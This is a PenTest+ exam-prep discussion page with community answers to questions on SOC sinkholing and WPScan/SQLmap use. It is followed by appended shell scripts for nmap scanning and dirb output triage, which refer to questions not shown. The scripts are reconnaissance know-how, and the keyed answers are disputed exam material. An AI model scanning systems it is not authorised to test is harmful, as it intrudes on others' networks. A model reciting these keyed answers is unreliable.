Community vote distribution B (100%)

RRabbit Highly Voted 1 year, 8 months ago
Selected Answer: B
Answer: B. The planning process failed to ensure all teams were notified.
Example: The penetration tester was unaware that the SOC had set up sinkholing on his IP address and was blocked from accessing the client's IP address because the SOC team was not notified of the penetration test.
upvoted 8 times

pizzaThyme Most Recent 1 month, 1 week ago
Selected Answer: B
B. Either the team was not made aware by accident and corrective action was taken by the SOC, OR the team was intentionally left in the dark in the case of red vs. blue / purple teaming exercises. I guess based on the fact that the pentester is surprised, it would only make sense that the SOC was not made aware.
:)
upvoted 1 times

[Removed] 9 months, 3 weeks ago
Selected Answer: B
I'm on blue team and this is how we test our SOCs.
upvoted 2 times

IYKMba 1 year, 1 month ago
I choose D
upvoted 1 times

solutionz 1 year, 1 month ago
Selected Answer: B
Sinkholing is a practice where traffic is redirected away from its original destination, often to a benign location, in response to suspicious or malicious activity. In the context of a penetration test, if the Security Operations Center (SOC) has sinkholed the penetration tester's IP address, it could indicate that the SOC was not properly informed of the authorized testing. Therefore, the most likely explanation for this occurrence is that there was a failure in the planning process to ensure that all relevant teams were properly notified of the upcoming penetration test. The correct answer to this question would be: B. The planning process failed to ensure all teams were notified.
upvoted 1 times

nickwen007 1 year, 6 months ago
Sinkholing is a security technique used to redirect malicious traffic away from its intended target. It involves creating a “black hole” of sorts by setting up a network of servers that will intercept and discard any packets sent to an IP address associated with malicious activity. This helps to prevent the malicious traffic from reaching its destination, thus reducing the impact of the attack.
upvoted 3 times

TCSNxS 1 year, 7 months ago
Answer is B. In a real world scenario, clients love to test the ability of their SOCs to detect their PenTesters. The easiest way was to not inform them.
upvoted 4 times

Question #18 Topic 1
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.
Correct Answer: C
Community vote distribution B (56%) C (44%)

masso435 Highly Voted 1 year, 10 months ago
Selected Answer: C
I think the wording is tricky. Yes both applications scan for vulnerabilities but not all vulnerabilities. This indicates it will find vulnerability outside of WordPress and SQL based on the wording alone.
upvoted 10 times

shakevia463 1 year, 7 months ago
Doesn't mean he's not attempting to find all vulnerabilities.... he is trying to find them.
upvoted 3 times

dcyberguy Highly Voted 1 year, 10 months ago
Selected Answer: B
Identifying Vulnerabilities should be the clear choice
upvoted 8 times

pizzaThyme Most Recent 1 month, 1 week ago
Selected Answer: B
I leaned toward B when I first read this but MAN I hate the way they word stuff like this. I hope I don't see this during my exam. Never have I seen so many professionals polarized on some of these questions before as I have with PT0-002.
upvoted 1 times

Kmelaun 1 month, 1 week ago
This is often the case with CompTIA exams.
upvoted 1 times

MeisAdriano 1 month, 2 weeks ago
Selected Answer: B
WPScan is used for WordPress vulnerabilities. SQLmap is used to find SQL injection vulnerabilities. If the pentester already found open doors with nmap, WPScan and SQLmap are just to complete ALL potential vulnerabilities. Not C because WPScan and SQLmap are not specified to limit invasiveness, they just find vulnerabilities for a specific purpose.
upvoted 1 times

djash22 2 months, 1 week ago
However, considering the specificity of the tools (WPScan for WordPress vulnerabilities and SQLmap for SQL injection vulnerabilities), it would be more accurate to say the tester aims to identify
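For Question #15 above, an added example (not from the thread) that keeps apart the two nmap concepts the discussion mixes up: `-PS<ports>` is a host-discovery probe (a SYN ping to those ports), `-sS` is the scan technique, and the ports to scan are given with `-p`; nmap has no `-Ss` switch. Run on its own, option C does produce port results, because after discovery nmap goes on to scan its default port list, but the list after `-PS` only governs discovery. The script below builds the discovery command, parses nmap's grepable (`-oG`) output to get the hosts that answered, and builds a SYN scan of exactly the interesting ports against them. The grepable output embedded here is constructed, not a real capture, and the `dry` mode uses it instead of running nmap.

```shell
#!/bin/sh
# Added example: separate host discovery (-PS) from port scanning (-sS -p).

# Stage 1: SYN-ping only the given ports to find live hosts (-sn = no port
# scan), grepable output to stdout so it can be piped.
discovery_cmd() {
    targets=$1; ports=$2
    printf 'nmap -sn -PS%s -oG - %s' "$ports" "$targets"
}

# Extract hosts marked "Up" from grepable output read on stdin.
live_hosts_from_gnmap() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Stage 2: SYN scan exactly the ports of interest on the live hosts, report
# only open ports, fingerprint the service behind each, save all formats.
portscan_cmd() {
    ports=$1; shift
    printf 'nmap -sS -p%s --open -sV -oA interesting %s' "$ports" "$*"
}

# Constructed -oG output of the kind stage 1 prints (not a real capture).
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -sn -PS22-25,80 -oG - 192.168.1.1-5
Host: 192.168.1.2 ()  Status: Up
Host: 192.168.1.3 ()  Status: Down
Host: 192.168.1.4 ()  Status: Up
# Nmap done -- 5 IP addresses (2 hosts up) scanned'

# Glue both stages. Third argument "dry" uses SAMPLE_GNMAP and prints the
# stage-2 command instead of running nmap.
scan_interesting_ports() {
    targets=$1; ports=$2; mode=${3:-run}
    if [ "$mode" = dry ]; then
        gnmap=$SAMPLE_GNMAP
    else
        command -v nmap >/dev/null 2>&1 || { echo "nmap not installed" >&2; return 1; }
        gnmap=$(sh -c "$(discovery_cmd "$targets" "$ports")")
    fi
    hosts=$(printf '%s\n' "$gnmap" | live_hosts_from_gnmap | tr '\n' ' ')
    [ -n "$hosts" ] || { echo "no live hosts" >&2; return 1; }
    # $hosts is deliberately unquoted: one argument per host.
    cmd=$(portscan_cmd "$ports" $hosts)
    if [ "$mode" = dry ]; then
        printf '%s\n' "$cmd"
    else
        sh -c "$cmd"
    fi
}

# Stand-alone run: dry mode prints the stage-2 command for the sample hosts.
scan_interesting_ports 192.168.1.1-5 22-25,80 dry
```

`-sS` needs raw-socket privileges, so run the non-dry mode as root; the discovery stage also sends raw SYNs when privileged and falls back to a TCP connect otherwise.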
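For Question #16 above, an added example (not from the thread, and not the tester's actual output, which the page does not reproduce): a shell triage of dirb's result lines. dirb prints each hit as `+ URL (CODE:nnn|SIZE:nnn)`; the functions below pull the URL and status code out of that format, separate the 5xx server errors from the 200s, and include the curl one-liner that confirms what the browser hid, since a browser may render a 500 with an empty body as a blank page. The dirb output embedded here is constructed to match the scenario in the question.

```shell
#!/bin/sh
# Added example: triage dirb output by HTTP status code.

# Constructed dirb output in its "+ URL (CODE:n|SIZE:n)" line format.
SAMPLE_DIRB='---- Scanning URL: http://172.16.100.10:3000/ ----
+ http://172.16.100.10:3000/admin (CODE:401|SIZE:0)
+ http://172.16.100.10:3000/login (CODE:200|SIZE:1532)
+ http://172.16.100.10:3000/profile (CODE:500|SIZE:0)
==> DIRECTORY: http://172.16.100.10:3000/images/
+ http://172.16.100.10:3000/robots.txt (CODE:200|SIZE:28)'

# Print "URL CODE" for every hit line read on stdin (directory lines and
# banner lines do not match the pattern and are dropped).
dirb_hits() {
    sed -n 's/^+ \([^ ]*\) (CODE:\([0-9]*\)|SIZE:[0-9]*)$/\1 \2/p'
}

# Keep only hits whose status is not 200 (stdin: dirb output).
dirb_non_ok() {
    dirb_hits | awk '$2 != 200'
}

# Keep only server-side errors, 5xx (stdin: dirb output).
dirb_server_errors() {
    dirb_hits | awk '$2 ~ /^5[0-9][0-9]$/'
}

# Re-check one URL by hand: print only the status code, discard the body.
# Not run in the demo; it needs network access to the target.
http_status() {
    curl -s -o /dev/null -w '%{http_code}' "$1"
}

printf 'non-200 hits:\n%s\n' "$(printf '%s\n' "$SAMPLE_DIRB" | dirb_non_ok)"
printf 'server errors:\n%s\n' "$(printf '%s\n' "$SAMPLE_DIRB" | dirb_server_errors)"
```

Feed a saved dirb log into `dirb_server_errors` to list the paths worth retrying; `http_status http://172.16.100.10:3000/profile` then shows `500` on the command line even when the browser shows nothing, which settles the question between a server error and a blocked port (a blocked port would give no 200s at all, and curl would report a connection failure rather than a status code).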